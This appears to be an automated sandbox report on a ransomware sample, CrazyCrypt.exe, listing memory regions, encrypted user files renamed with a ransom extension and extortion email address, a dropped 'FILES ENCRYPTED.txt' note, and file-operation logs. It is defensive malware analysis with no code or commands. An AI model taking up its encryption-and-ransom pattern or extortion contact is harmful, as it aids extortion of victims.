75620d6ae02a9a3beb5eb47020012eee52001bf434304f4e77b43011a6e5595a (SHA256)
CrazyCrypt.exe
Windows Exe (x86-32)
Created at 2019-02-28 11:07:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: crazycrypt.exe
5169
17
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe |
| Command Line | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CrazyCrypt.exe" |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:05, Reason: Analysis Target |
| Unmonitor | End Time: 00:05:05, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x98c |
| Parent PID | 0x460 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
990
0x
994
0x
998
0x
9AC
0x
9B0
0x
9B4
0x
9B8
0x
9BC
0x
AEC
0x
AF0
0x
AF4
0x
AF8
0x
0
0x
954
0x
958
0x
94C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00072fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x000fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | rw |
|
|
|
- |
| l_intl.nls | 0x00120000 | 0x00122fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x00296fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003bffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00440fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00560000 | 0x005dcfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00561fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00594fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00600000 | 0x00600fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0069ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00827fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x009b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x00abffff | Private Memory | rw |
|
|
|
- |
| gdipfontcachev1.dat | 0x00ac0000 | 0x00adafff | Memory Mapped File | rw |
|
|
|
|
| segoeui.ttf | 0x00ac0000 | 0x00b3efff | Memory Mapped File | r |
|
|
|
- |
| ariali.ttf | 0x00ac0000 | 0x00b47fff | Memory Mapped File | r |
|
|
|
- |
| arialbi.ttf | 0x00ac0000 | 0x00b49fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x00ac1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00bcffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00cd0000 | 0x00f9efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x010a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000010b0000 | 0x010b0000 | 0x0118efff | Pagefile Backed Memory | r |
|
|
|
- |
| crazycrypt.exe | 0x01190000 | 0x011affff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00000000011b0000 | 0x011b0000 | 0x025affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x1a5affff | Private Memory | rw |
|
|
|
- |
| private_0x000000001a5b0000 | 0x1a5b0000 | 0x1ac7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ac80000 | 0x1ac80000 | 0x1ad3ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x1ac80000 | 0x1ad2afff | Memory Mapped File | r |
|
|
|
- |
| micross.ttf | 0x1ac80000 | 0x1ad1ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000001ac80000 | 0x1ac80000 | 0x1ac8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ac90000 | 0x1ac90000 | 0x1ac9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001aca0000 | 0x1aca0000 | 0x1acaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001acb0000 | 0x1acb0000 | 0x1acbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001acc0000 | 0x1acc0000 | 0x1accffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001acd0000 | 0x1acd0000 | 0x1acdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ace0000 | 0x1ace0000 | 0x1aceffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001acf0000 | 0x1acf0000 | 0x1acfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ad00000 | 0x1ad00000 | 0x1ad0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ad10000 | 0x1ad10000 | 0x1ad1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ad30000 | 0x1ad30000 | 0x1ad3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ad40000 | 0x1ad40000 | 0x1ae3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ae40000 | 0x1ae40000 | 0x1b09ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ae40000 | 0x1ae40000 | 0x1af3ffff | Private Memory | rw |
|
|
|
- |
| arial.ttf | 0x1af40000 | 0x1affcfff | Memory Mapped File | r |
|
|
|
- |
| arialbd.ttf | 0x1af40000 | 0x1aff6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000001b020000 | 0x1b020000 | 0x1b09ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b0e0000 | 0x1b0e0000 | 0x1b1dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b1e0000 | 0x1b1e0000 | 0x1b2dffff | Private Memory | rw |
|
|
|
- |
| msjh.ttf | 0x1b2e0000 | 0x1c788fff | Memory Mapped File | r |
|
|
|
- |
| msyh.ttf | 0x1b2e0000 | 0x1c7a2fff | Memory Mapped File | r |
|
|
|
- |
| malgun.ttf | 0x1b2e0000 | 0x1b702fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000001b2e0000 | 0x1b2e0000 | 0x1b41ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b420000 | 0x1b420000 | 0x1b51ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b710000 | 0x1b710000 | 0x1b90ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x1b910000 | 0x1c23ffff | Memory Mapped File | r |
|
|
|
- |
| msvcr80.dll | 0x753c0000 | 0x75488fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| system.runtime.remoting.ni.dll | 0x7fef0ad0000 | 0x7fef0bccfff | Memory Mapped File | rwx |
|
|
|
- |
| system.windows.forms.ni.dll | 0x7fef0bd0000 | 0x7fef1c65fff | Memory Mapped File | rwx |
|
|
|
- |
| system.drawing.ni.dll | 0x7fef1c70000 | 0x7fef1ea6fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorjit.dll | 0x7fef1eb0000 | 0x7fef2033fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x7fef2040000 | 0x7fef224cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fef2250000 | 0x7fef2c72fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fef2c80000 | 0x7fef3b5bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fef3b60000 | 0x7fef44fcfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fef46c0000 | 0x7fef4758fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef4b60000 | 0x7fef4bcefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefbbb0000 | 0x7fefbbc7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x7fefbd70000 | 0x7fefbf84fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefbf90000 | 0x7fefbfe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc040000 | 0x7fefc233fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefc970000 | 0x7fefc97bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd6a0000 | 0x7fefd6aefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd7b0000 | 0x7fefd7befff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdf00000 | 0x7fefec87fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feff870000 | 0x7feffa72fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff001bffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff001c0000 | 0x7ff001c0000 | 0x7ff001cffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff001d0000 | 0x7ff001d0000 | 0x7ff001dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff001e0000 | 0x7ff001e0000 | 0x7ff001effff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 182 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Y90-.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | 38.94 KB |
MD5:
c1c35eb01c2861ff86ec90105f1bc81e
SHA1: 88a547904bb677bbeef452689965314701facda6 SHA256: 8a9f15d2c7484f79991a895fbb36dd6f545d416ce95bcaf64b25abe21b4c41f3 SSDeep: 768:AH6GssmJPw0DoMk3BSAri2ZmIXvSRQmkZ0/b:AauMPw+oMk3BSU8IXNmRj |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Music\IoTrl5QTOTSX6.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | 13.80 KB |
MD5:
18128070c2461ada059d23e34c46a083
SHA1: ef8d696ec368e7348213250b65504b37f3ca0d09 SHA256: bd7ab9395ceda84ff52dfeea8ec1ae0bbdc31f580b1eeaa22a8bd2773ef4697d SSDeep: 192:8P5OYbH4yo2L96awK0xIXwDCYXh29kR4CUfs4ZMNt3INeYrtPKPAe/Dom6GGlTXj:IOmYxMnwpxIXXYQk344t4wuRKY+UVpLZ |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\342WkTEC8.png.id.9C354B42.[buykey@decryptionsales.online].crazy | 28.14 KB |
MD5:
8080d206d26761c209fa253a022747e1
SHA1: 3cd521d3d2791c959ccb81ead096ea7929301f2a SHA256: 4dc10de2767c41086ef123a48e3b8fea7c06dda8f18e0604629baffe5d3f36ec SSDeep: 768:mvVxs7Z1PJqsTTBz1JmfOqP8rYDslPMiTRfjIos9icMhPS:mvXs91PnN1JkBV0TtjI/9khS |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Music\MCEh.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | 47.19 KB |
MD5:
424aced1135c33b684305279dc9ae27d
SHA1: 0a3ab0032a21b0e4693d43b4acf7fd4602dae23e SHA256: cebafc11d3ad041a825c03c35c579760424442c4a6b9d8051ea8ee23e8905de5 SSDeep: 768:oPUM+oicfCvqiCAgj1DXu7pdEeDl6mYoMhzsco9uHal6Lw9UpETvr3x/6BREQlAA:nB0iaVwqUMmYzs/9uHaULwipEXxixAc5 |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frCI.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | 13.61 KB |
MD5:
92acaa352d334ff4704b001d4ca04da3
SHA1: 4b2b96573241ce430a589b2b7da8e270c6e4e129 SHA256: 5518673789ea0e870c7edc41d55d30fbc2f98ad4119d7ecd0022c9d86d29b799 SSDeep: 192:cyt4RLplk43Hk6QHAWNzjbUsFgpnMHL6W97eVNBP8RHYs+2g4w3znK+mzOJTcHnc:cQ4TN3k65WadpD3BOH7t3w3m+KTW1+3s |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\FILES ENCRYPTED.txt | 0.13 KB |
MD5:
8e5c69f75f3c777976d23d86a0e064b8
SHA1: 749505b24144c18c82bac300b7cfbd1e56dc7bf9 SHA256: 9e24b551689370ed32f80713fda8c57e49b22d5317acb0372cd572b374f7d484 SSDeep: 3:gJ9QVP9AuFJKZkFDSQFVFf2bj503G31LAlF+LDFc5Y0RXcT:gXGljJdjFvkAGRQQLDFqY0xcT |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xeoTJv4Tf_T FQ6GC.png.id.9C354B42.[buykey@decryptionsales.online].crazy | 87.84 KB |
MD5:
86c523fbd2ae98614472fbe0b548ccd1
SHA1: a9d3a43196d5deb076ce794d9c13b7477ba27e60 SHA256: bbaba0b72fdc53659c39e3eaba2492102e4c6be9c487eb379b3d8ddc5a3e037b SSDeep: 1536:1r47Ux4/lRnhM17F1q3DwgW5hO6dVobdfn9apTqsY95XnN845oYrlf:1rEUAwFbqi71dqR96+5Dealf |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\YEzJBw.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | 89.92 KB |
MD5:
2b2877db35cbe0ce9a1cde842635a4fc
SHA1: c4e3b550f0dcc0e231b8f524c28cce5603f14d83 SHA256: dcf616c1501e7019af8e9c2fdc316f766148aeba0c94b29ff050f068a5ed0539 SSDeep: 1536:E1UbXoNCYxHbIZD1f9Ngt4srFbjviOnNr/jeAC+XKIbFxAFsTTUVLLS2lI:E1NCYo1fAt4AyOBbRbFeFU4VblI |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Music\GB8gg.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | 99.58 KB |
MD5:
a00317e365c069c3b1bb7543d02a0eb6
SHA1: c1c69a7174481b784e4506b919b7296310835158 SHA256: 9c4ad045d65642a4f54d43b5e2525d323f47b7dd05304fce81b0d501a005d779 SSDeep: 3072:4iimPChrT20oFVTj+F/xcIk+RucjD1mlWLQ3D/:4iZ6hrT27HT22+YRB/ |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Music\-FfGLM.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | 79.38 KB |
MD5:
f932ec25c904286eb556915ae115acb5
SHA1: 5a2bffe166a5a668d083b12a54d5be1159a11127 SHA256: 957560d7521decd3e6b3d696d8daf70e22f6efbe61c892419779f646381c3c90 SSDeep: 1536:sgGucVpNLqYTD06QJgyig345HOCOwE+zyXArdLvo75cXlg+5DQnGwIL:sgGXNL1AJTig3Hs2ArdLvCwlbQIL |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\NAdu7zq2Ultdz.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | 56.31 KB |
MD5:
daf5509c965617b67ce990560015126a
SHA1: 81a197751720c8d92d65f109fbfa0f2a1e474c6c SHA256: c064da1c8c0f885b93383b6adf5b8d9269da571ce89e73e38f4ba8618347b414 SSDeep: 768:6kNQvNNn1CiU84d8+F9hHsD5Dury3AdHSwO9wcPutD0VL4lsQqhmN1TyaDdG:6kNm/4C8LM9cHSw5cfVL4eA1RpG |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\5p5nrgjn0js halpmcxz\appdata\local\gdipfontcachev1.dat | 106.27 KB |
MD5:
92e128dcb152d05f07faf5da64bd1c91
SHA1: 2174814ca563fc2b9679fffbf1b40bdf3ac9abec SHA256: 11437a99f5f9c0a6df09c64abc8828ad3ecd8cf4fa601340ded86b8945edff43 SSDeep: 768:i8HrbdvVyZHgTl7ho5sZWN/Ys9byFRQ+AwqGuGyZoVyOF7rrlqTIyMnm:/pVyZHgTl7h6tKR7AwqlGyZQVO1Mnm |
|
|
Host Behavior
COM (6)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WbemDefaultPathParser | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
3 | |
| Create | WBEMLocator | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 |
File (4426)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\342WkTEC8.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\342WkTEC8.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frCI.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frCI.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\NAdu7zq2Ultdz.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\NAdu7zq2Ultdz.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xeoTJv4Tf_T FQ6GC.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xeoTJv4Tf_T FQ6GC.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Y90-.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Y90-.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\YEzJBw.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\YEzJBw.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4NEkZ3-.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4NEkZ3-.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4shw8omFOm4wayp_m.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4shw8omFOm4wayp_m.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRyQ8IPXFJa5DCwplgw.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRyQ8IPXFJa5DCwplgw.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\dIWmCM25b.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
